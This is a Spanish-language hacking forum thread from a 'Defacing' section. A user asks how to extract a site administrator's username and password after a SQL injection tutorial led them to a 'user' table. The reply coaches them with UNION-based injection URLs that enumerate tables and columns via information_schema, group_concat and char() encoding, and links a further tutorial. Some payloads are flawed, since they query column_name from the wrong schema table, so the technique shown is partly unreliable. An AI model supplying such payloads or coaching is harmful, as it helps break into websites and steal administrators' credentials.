ENTRAR EN EL FOROHACK ANTIGUO (Muchos temas viejos y de menor nivel)
14:08:06 12/11/2019
¿No estas registrado?
Login: Clave:
6 Usuarios en línea: 0 registrados, 6 invitados.
Conéctate y verás los usuarios en línea
Tema: Ayuda con injeccion sql
    Responder
Todos Los Foros -> Defacing -> Ayuda con injeccion sql
Autor Mensaje (Ver Versión para Imprimir)
Matias10
Usuario muy espontáneo
Sin Imagen

Mensajes: 1
Registrad@:
06/08/2010
Estado: Desconectad@
Ver último Post
Ayuda con injeccion sql

Siguiedo este tutorial llege a lo siguiente:

http://www.miweb.com/noticia.php?id=-1+union+all+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+24,1--

Y me da una noticia con el titulo ''user'' me imagino que eso es la tabla de los usuarios pero ahora que debo hacer?? como llego al user y pass del admin!

es urgente ayuda please
07/08/2010 19:21:00 
k_t_den
Aprendiz nivel 3

Mensajes: 74
Registrad@:
01/12/2008
Estado: Desconectad@
Ir Arriba
RE: Ayuda con injeccion sql

Hola,
la tabla que te da tienes que pasarla a ASCII, aqui podras ver los acaracteres de cada letra en ASCII.
ASCII Table
y donde table_name, cambialo por column_name
quedando asi la url:

http://www.miweb.com/noticia.php?id=-1+union+all+select+1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_name=char(117,115,101,114)--

para buscar las tablas puedes utilizar group_concat(), asi no tendras que utilizar el limit.
ejemplo:

http://www.miweb.com/noticia.php?id=-1+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15+from+information_schema.tables--

y para buscar las columnas tambien:

http://www.miweb.com/noticia.php?id=-1+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15+from+information_schema.tables--

Pero ahi no termina, si quieres saber mas, lee el siguienete tutorial:

http://www.forohack.com/index.php?Ver=Mensaje&Id=369&WebOrigen=1

salu2.
08/08/2010 15:21:18 


REGÍSTRATE PARA PODER ENVIAR UN MENSAJE (tardas 20 segundos)

Copyright ForoHack.com